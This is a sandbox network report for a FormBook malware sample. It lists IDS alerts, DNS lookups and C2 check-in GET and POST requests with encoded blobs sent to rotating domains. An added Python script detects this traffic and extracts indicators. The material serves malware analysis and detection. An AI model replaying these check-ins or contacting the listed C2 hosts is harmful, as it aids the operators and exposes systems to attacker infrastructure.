                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.7:50015 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.7:50019 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.7:50019 -> 13.248.169.48:80
                Source: DNS query: www.sidang.xyz
                Source: DNS query: www.hastanhizmetleri.xyz
                Source: DNS query: www.noudge.xyz
                Source: DNS query: www.031235045.xyz
                Source: DNS query: www.vaishnavi.xyz
                Source: DNS query: www.dualbitcoin.xyz
                Source: DNS query: www.gelida.xyz
Source: Joe Sandbox View | IP Address: 8.210.49.139
Source: Joe Sandbox View | IP Address: 144.76.229.203
Source: Joe Sandbox View | IP Address: 13.248.169.48
Source: Joe Sandbox View | ASN Name: CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC
Source: Joe Sandbox View | ASN Name: ACPCA
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1 (13 occurrences)
Source: global traffic | HTTP traffic detected: GET /cwaj/?1N=k898KziH&3vhxw=NmUfxQrz0WFQu6ex3B+4pm0wutRNdkQrCagHYkSMqQArAACBkiI71BEuNA1edrIRm5QCdE2XawPBlU7vbp4P2eGZM+ObLLuwfcBOqu52BvYuUPALHlcYrQ0Je8wl9skZiVn7occL/PQX HTTP/1.1 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 | Accept-Language: en-US,en;q=0.9 | Host: www.isoemarket.shop | Connection: close | User-Agent: Mozilla/5.0 (iPad; CPU OS 6_0_2 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10A550 Safari/8536.25
Source: global traffic | HTTP traffic detected: GET /6wi0/?3vhxw=MUmOKOjVbEpAXFm9wjsh8/qMHN43MS2c6TEVXWaXYAj73tUw1MgyAUdmulGWvnB4v8QQA07PGVxg24rIHlu15xcomf7OQeclW9hY0QeF29uLuZGvMve3WYBZELn2//dDCzjglcOqyXn6&1N=k898KziH HTTP/1.1 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 | Accept-Language: en-US,en;q=0.9 | Host: www.vsilmhxj.tokyo | Connection: close | User-Agent: Mozilla/5.0 (iPad; CPU OS 6_0_2 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10A550 Safari/8536.25
Source: global traffic | HTTP traffic detected: GET /0j68/?1N=k898KziH&3vhxw=T5zk9dsLIunu/n4sMlTl5TxbL17m3yvhtRkOTnRpQURxiR8cfQXlWi1cANaqvjchzXTdjhRSt4g8/GNhVjyhRyZhSJdRQ/J2TIImfi1snZM3UUnEAE7VU3U4pUdkFvMoGOL6w/t1JlER HTTP/1.1 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 | Accept-Language: en-US,en;q=0.9 | Host: www.sidang.xyz | Connection: close | User-Agent: Mozilla/5.0 (iPad; CPU OS 6_0_2 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10A550 Safari/8536.25
Source: global traffic | HTTP traffic detected: GET /yw3f/?3vhxw=EQSrhtPuDg3pW57/t668kTJUp7qGcAJHL6EaWebBO0TpTRxDo7/bTIB2xez8ddqkXF2LbmtEbkI7kZgVxT7fPzMQDO1n3kUCd1dpbtAqXWVIJELRlQ9s0cN+drvMzU+uHCj+pJSFwLvO&1N=k898KziH HTTP/1.1 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 | Accept-Language: en-US,en;q=0.9 | Host: www.hastanhizmetleri.xyz | Connection: close | User-Agent: Mozilla/5.0 (iPad; CPU OS 6_0_2 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10A550 Safari/8536.25
Source: global traffic | HTTP traffic detected: GET /n00b/?3vhxw=iQ+QS1lo6uvIGGPL/anhhZjVtxmDNRRo2wOeU9EorhnMg6Dg3MakUEzOvHEw8ZD+mNMFq81MdilwNKpwrucL8V4v3FR1ZtxrzHpl5AutDtRsbISiPqNN/qAd5FYgDB3nxCxjLBVHOS/k&1N=k898KziH HTTP/1.1 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 | Accept-Language: en-US,en;q=0.9 | Host: www.noudge.xyz | Connection: close | User-Agent: Mozilla/5.0 (iPad; CPU OS 6_0_2 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10A550 Safari/8536.25
Source: global traffic | HTTP traffic detected: GET /x35a/?3vhxw=dWY7lI8HDhihY6JPDiu2Y6hLOPsEmINoIrDJkGpZj0gBIjegzPnOseQLWLFbNyUuWYMzRp0ci/LZueoJN+9YnCwPl5N4ruuJ4viUbVqN/fyZ+aJRUNvg59RbxNoTZeh8X7AKxZRS04++&1N=k898KziH HTTP/1.1 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 | Accept-Language: en-US,en;q=0.9 | Host: www.031235045.xyz | Connection: close | User-Agent: Mozilla/5.0 (iPad; CPU OS 6_0_2 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10A550 Safari/8536.25
Source: global traffic | HTTP traffic detected: GET /2p9f/?1N=k898KziH&3vhxw=kR4sXqxEqdCKxcdw2vMtqb3AM0C84J13h13R7fH3Y7T7Jml87ikCWT0lH6J8YdG1qFj+UvZ1zE/9YSWRQ7SaBHva0aI7MrSJL/DkXnnJZsD8pjOQokCsDCx5QkisekfcYXD88MR0pBon HTTP/1.1 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 | Accept-Language: en-US,en;q=0.9 | Host: www.fkrvhaupjtc.info | Connection: close | User-Agent: Mozilla/5.0 (iPad; CPU OS 6_0_2 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10A550 Safari/8536.25
Source: global traffic | HTTP traffic detected: GET /a255/?3vhxw=71qW4Nx4dt5SfVYZkQHtIjrMqfw8DY/cD1lK2mKt9LCJZ4STjm65LcjSJQ2HTSiE+Z7WdPOkz4Dc0w/KNAm2+hPg4Y2yewEtiUJ7K61oh8ePqJTAajNoHkpH+qg0ClVj3QG6QQvwQIGE&1N=k898KziH HTTP/1.1 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 | Accept-Language: en-US,en;q=0.9 | Host: www.vintageprod.net | Connection: close | User-Agent: Mozilla/5.0 (iPad; CPU OS 6_0_2 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10A550 Safari/8536.25
Source: global traffic | HTTP traffic detected: GET /lfjm/?3vhxw=SYdBkJci5v39nf4UBCyxxB+PkIPUh5cSvGXaIroc+h3NqMcJAPR48Il0IqREyzliai9XD9lgyxpgfQFl8d4wnuSgvNqmFik7Lfg61ffR8EDqoC7H1nCHxBZZ3B2j2IRwe1DzZrpEXKqI&1N=k898KziH HTTP/1.1 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 | Accept-Language: en-US,en;q=0.9 | Host: www.vaishnavi.xyz | Connection: close | User-Agent: Mozilla/5.0 (iPad; CPU OS 6_0_2 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10A550 Safari/8536.25
Source: global traffic | HTTP traffic detected: GET /6m32/?3vhxw=Va/we0xl003DQZZ95AFUEv2evIgZUlG+bUy9vd5w4QTsm7kbnVGOKZ/fShoalOeRjCVBwCWzFLQL56uWIkSaj+cOcYHy4w2KfsDzTDQlZgMNN4Mxl2pFsMG9FPNDeGnE0bc2OvtfAJPy&1N=k898KziH HTTP/1.1 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 | Accept-Language: en-US,en;q=0.9 | Host: www.rbopisalive.cyou | Connection: close | User-Agent: Mozilla/5.0 (iPad; CPU OS 6_0_2 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10A550 Safari/8536.25
Source: global traffic | HTTP traffic detected: GET /o4w6/?1N=k898KziH&3vhxw=6lKfvrTTzjNBleeoPlg/CC2pMX1objNQ3seX6l6NteG/OnLU2Wkj2ZjnFUXwTNDzYGydJHdrz8GXGpxHCC5uPjGKdUqqSRGcmKjetsGXxK5ZD6rTwPW2bTSlaUBfbIja4NW3aGlv9dim HTTP/1.1 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 | Accept-Language: en-US,en;q=0.9 | Host: www.dualbitcoin.xyz | Connection: close | User-Agent: Mozilla/5.0 (iPad; CPU OS 6_0_2 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10A550 Safari/8536.25
Source: global traffic | HTTP traffic detected: GET /3xxf/?3vhxw=nI71gAHwA2y1h+HY+qsI8s92/p9MV/yUWZbbeDVE2zDMFU7E/I5Jnbhdlga2X4Rk93x69PX2UbpyE4MrGgdncrw39XWSQ3dD8rBn3U9v867aY8q9vajCMhYhBrTGm54L8Sd9VHnWRVW9&1N=k898KziH HTTP/1.1 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 | Accept-Language: en-US,en;q=0.9 | Host: www.gelida.xyz | Connection: close | User-Agent: Mozilla/5.0 (iPad; CPU OS 6_0_2 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10A550 Safari/8536.25
Source: global traffic | DNS traffic detected: DNS query: time.windows.com
Source: global traffic | DNS traffic detected: DNS query: www.isoemarket.shop
Source: global traffic | DNS traffic detected: DNS query: www.vsilmhxj.tokyo
Source: global traffic | DNS traffic detected: DNS query: www.sidang.xyz
Source: global traffic | DNS traffic detected: DNS query: www.hastanhizmetleri.xyz
Source: global traffic | DNS traffic detected: DNS query: www.noudge.xyz
Source: global traffic | DNS traffic detected: DNS query: www.031235045.xyz
Source: global traffic | DNS traffic detected: DNS query: www.fkrvhaupjtc.info
Source: global traffic | DNS traffic detected: DNS query: www.vintageprod.net
Source: global traffic | DNS traffic detected: DNS query: www.vaishnavi.xyz
Source: global traffic | DNS traffic detected: DNS query: www.rbopisalive.cyou
Source: global traffic | DNS traffic detected: DNS query: www.dualbitcoin.xyz
Source: global traffic | DNS traffic detected: DNS query: www.gelida.xyz
Source: unknown | HTTP traffic detected: POST /6wi0/ HTTP/1.1 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 | Accept-Encoding: gzip, deflate, br | Accept-Language: en-US,en;q=0.9 | Host: www.vsilmhxj.tokyo | Origin: http://www.vsilmhxj.tokyo | Connection: close | Content-Length: 218 | Content-Type: application/x-www-form-urlencoded | Cache-Control: max-age=0 | Referer: http://www.vsilmhxj.tokyo/6wi0/ | User-Agent: Mozilla/5.0 (iPad; CPU OS 6_0_2 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10A550 Safari/8536.25 | Data Ascii: 3vhxw=BWOuJ7DkUWFCW0v+jQcPocjxIu4bACG0rQQlbW2iejPw7LoC37oLD0pn0xf1jmZmpftHEgPUTTpj2J3WGly1vm5IndPSU5UAVOw4zWT048uQms/oOZu9eNJsFITY/cA5HwCg69zNsWXvkyCavsmEgLkGFwdtvty8wMg5mJ6zFZZ5QGHlNqES+h/TXv0p7JVr+bwuqkQXC/6/7XRZNg==
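The requests listed above all have the same shape: a GET to a four-character path with two query parameters, one an 8-character value that stays constant across every host (1N=k898KziH) and one a long base64-like blob, sent with a fixed iPad Safari User-Agent and Connection: close, followed by a POST of the same kind of blob to the same path, while the Host rotates through a list of domains. The Python below is an added example and is not Joe Sandbox code or code from the malware: it parses the flattened "HTTP traffic detected" records the way the report renders them (headers run together without separators), scores each request against those traits, and collects the hosts, the constant id and the User-Agent as indicators. The sample records are copied in shape from this page (the GET to www.sidang.xyz and the POST to www.vsilmhxj.tokyo) plus one constructed benign request to www.example.com; the threshold of three matching traits is an assumption for illustration, not a published rule.

```python
import re

# Regexes keyed on header names, because each record is one string with no
# separator between headers (e.g. "...www.sidang.xyzConnection: close").
_REQ = re.compile(r"\b(?P<method>GET|POST) (?P<target>\S+) HTTP/1\.[01]")
_HOST = re.compile(r"Host: (?P<host>[a-z0-9.-]+)")
_UA = re.compile(r"User-Agent: (?P<ua>.+?)(?=Data Raw:|Data Ascii:|$)")
_BODY = re.compile(r"Data Ascii: (?P<body>\S+)")

# Values observed in the requests on this page.
FORMBOOK_UA = ("Mozilla/5.0 (iPad; CPU OS 6_0_2 like Mac OS X) AppleWebKit/536.26 "
               "(KHTML, like Gecko) Version/6.0 Mobile/10A550 Safari/8536.25")
_PATH = re.compile(r"^/[a-z0-9]{4}/$")            # /0j68/, /6wi0/, ...
_ID = re.compile(r"^[A-Za-z0-9]{8}$")             # k898KziH
_BLOB = re.compile(r"^[A-Za-z0-9+/]{64,}={0,2}$")  # the long encrypted blob

# Constructed sample: two records copied in shape from this report plus one
# made-up benign request (www.example.com is not on the page).
SAMPLE_RECORDS = [
    "Source: global trafficHTTP traffic detected: GET /0j68/?1N=k898KziH&3vhxw="
    "T5zk9dsLIunu/n4sMlTl5TxbL17m3yvhtRkOTnRpQURxiR8cfQXlWi1cANaqvjchzXTdjhRSt4g8/"
    "GNhVjyhRyZhSJdRQ/J2TIImfi1snZM3UUnEAE7VU3U4pUdkFvMoGOL6w/t1JlER HTTP/1.1"
    "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,"
    "image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7"
    "Accept-Language: en-US,en;q=0.9Host: www.sidang.xyzConnection: close"
    "User-Agent: " + FORMBOOK_UA,
    "Source: unknownHTTP traffic detected: POST /6wi0/ HTTP/1.1Accept: text/html,"
    "application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,"
    "*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflate, "
    "brAccept-Language: en-US,en;q=0.9Host: www.vsilmhxj.tokyoOrigin: "
    "http://www.vsilmhxj.tokyoConnection: closeContent-Length: 218Content-Type: "
    "application/x-www-form-urlencodedCache-Control: max-age=0Referer: "
    "http://www.vsilmhxj.tokyo/6wi0/User-Agent: " + FORMBOOK_UA + "Data Ascii: "
    "3vhxw=BWOuJ7DkUWFCW0v+jQcPocjxIu4bACG0rQQlbW2iejPw7LoC37oLD0pn0xf1jmZmpftHEgPUTT"
    "pj2J3WGly1vm5IndPSU5UAVOw4zWT048uQms/oOZu9eNJsFITY/cA5HwCg69zNsWXvkyCavsmEgLkGFw"
    "dtvty8wMg5mJ6zFZZ5QGHlNqES+h/TXv0p7JVr+bwuqkQXC/6/7XRZNg==",
    "Source: global trafficHTTP traffic detected: GET /index.html HTTP/1.1"
    "Accept: */*Host: www.example.comConnection: closeUser-Agent: curl/8.4.0",
]


def _form(s):
    """Split k=v&k=v without URL-decoding, so '+' and '/' in the blobs survive."""
    return dict(kv.split("=", 1) for kv in s.split("&") if "=" in kv)


def parse_record(line):
    """Turn one flattened 'HTTP traffic detected' record into a dict, or None."""
    m = _REQ.search(line)
    if not m:
        return None
    path, _, query = m.group("target").partition("?")
    host, ua, body = _HOST.search(line), _UA.search(line), _BODY.search(line)
    return {
        "method": m.group("method"),
        "path": path,
        "query": _form(query),
        "body": _form(body.group("body")) if body else {},
        "host": host.group("host") if host else None,
        "ua": ua.group("ua") if ua else None,
    }


def formbook_features(rec):
    """Names of the check-in traits seen above that this request shares."""
    feats = []
    if _PATH.match(rec["path"]):
        feats.append("four-char path")
    if rec["ua"] == FORMBOOK_UA:
        feats.append("fixed iPad UA")
    vals = list(rec["query"].values()) + list(rec["body"].values())
    if any(_BLOB.match(v) for v in vals):
        feats.append("long base64-like blob")
    if rec["method"] == "GET" and any(_ID.match(v) for v in vals):
        feats.append("8-char id value")
    return feats


def is_formbook_shaped(rec, min_features=3):
    """Threshold is an assumption: three of the four traits flags a request."""
    return len(formbook_features(rec)) >= min_features


def extract_iocs(lines):
    """Hosts, constant ids and user agents from records that match the shape."""
    recs = [r for r in map(parse_record, lines) if r and is_formbook_shaped(r)]
    return {
        "hosts": sorted({r["host"] for r in recs if r["host"]}),
        "ids": sorted({v for r in recs for v in r["query"].values() if _ID.match(v)}),
        "user_agents": sorted({r["ua"] for r in recs if r["ua"]}),
    }


if __name__ == "__main__":
    for rec in map(parse_record, SAMPLE_RECORDS):
        print(rec["method"], rec["host"], formbook_features(rec))
    print(extract_iocs(SAMPLE_RECORDS))
```

Pointing this at the full list of records on the page yields the rotating host list as a block-list candidate, while the constant id value and the User-Agent are the features worth turning into a proxy or IDS rule, since the hosts change from sample to sample.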
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Thu, 06 Mar 2025 04:40:43 GMT | Server: Apache | Content-Length: 16052 | Connection: close | Content-Type: text/html | Data Ascii (body truncated in the report): <!DOCTYPE html> <html lang="en" > <head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"> <link rel="stylesheet" href="/42.css"> </head> <body> <!-- partial:index.partial.html --> <main> <svg viewBox="0 0 541.17206 328.45184" height="328.45184" width="541.17206" id="svg2" version="1.1"> <metadata id="metadata8"> </metadata> <defs id="defs6"> <pattern patternUnits="userSpaceOnUse" width="1.5" height="1" patternTransform="translate(0,0) scale(10,10)" id="Strips2_1"> <rect style="fill:black;stroke:none" x="0" y="-0.5" width="1" height="2" id="rect5419" /> </pattern> <linearGradient osb:paint="solid" id="linearGradient6096">
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Thu, 06 Mar 2025 04:40:45 GMT | Server: Apache | Content-Length: 16052 | Connection: close | Content-Type: text/html | Data Ascii (body truncated in the report): <!DOCTYPE html> <html lang="en" > <head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"> <link rel="stylesheet" href="/42.css"> </head> <body> <!-- partial:index.partial.html --> <main> <svg viewBox="0 0 541.17206 328.45184" height="328.45184" width="541.17206" id="svg2" version="1.1"> <metadata id="metadata8"> </metadata> <defs id="defs6"> <pattern patternUnits="userSpaceOnUse" width="1.5" height="1" patternTransform="translate(0,0) scale(10,10)" id="Strips2_1"> <rect style="fill:black;stroke:none" x="0" y="-0.5" width="1" height="2" id="rect5419" /> </pattern> <linearGradient osb:paint="solid" id="linearGradient6096">
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Thu, 06 Mar 2025 04:40:48 GMT | Server: Apache | Content-Length: 16052 | Connection: close | Content-Type: text/html | Data Ascii (body truncated in the report): <!DOCTYPE html> <html lang="en" > <head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"> <link rel="stylesheet" href="/42.css"> </head> <body> <!-- partial:index.partial.html --> <main> <svg viewBox="0 0 541.17206 328.45184" height="328.45184" width="541.17206" id="svg2" version="1.1"> <metadata id="metadata8"> </metadata> <defs id="defs6"> <pattern patternUnits="userSpaceOnUse" width="1.5" height="1" patternTransform="translate(0,0) scale(10,10)" id="Strips2_1"> <rect style="fill:black;stroke:none" x="0" y="-0.5" width="1" height="2" id="rect5419" /> </pattern> <linearGradient osb:paint="solid" id="linearGradient6096">
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Thu, 06 Mar 2025 04:40:51 GMT | Server: Apache | Content-Length: 16052 | Connection: close | Content-Type: text/html; charset=utf-8 | Data Ascii (body truncated in the report): <!DOCTYPE html> <html lang="en" > <head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"> <link rel="stylesheet" href="/42.css"> </head> <body> <!-- partial:index.partial.html --> <main> <svg viewBox="0 0 541.17206 328.45184" height="328.45184" width="541.17206" id="svg2" version="1.1"> <metadata id="metadata8"> </metadata> <defs id="defs6"> <pattern patternUnits="userSpaceOnUse" width="1.5" height="1" patternTransform="translate(0,0) scale(10,10)" id="Strips2_1"> <rect style="fill:black;stroke:none" x="0" y="-0.5" width="1" height="2" id="rect5419" /> </pattern> <linearGradient osb:paint="solid" id="linearGradient6
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Thu, 06 Mar 2025 04:40:56 GMT | Server: Apache | Content-Length: 315 | Connection: close | Content-Type: text/html; charset=iso-8859-1 | Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL was not found on this server.</p> <p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p> </body></html>
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Thu, 06 Mar 2025 04:40:59 GMT | Server: Apache | Content-Length: 315 | Connection: close | Content-Type: text/html; charset=iso-8859-1 | Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL was not found on this server.</p> <p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p> </body></html>
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Thu, 06 Mar 2025 04:41:01 GMT | Server: Apache | Content-Length: 315 | Connection: close | Content-Type: text/html; charset=iso-8859-1 | Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL was not found on this server.</p> <p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p> </body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 06 Mar 2025 04:41:04 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 06 Mar 2025 04:42:16 GMTServer: Apache/2Content-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 06 Mar 2025 04:42:18 GMTServer: Apache/2Content-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
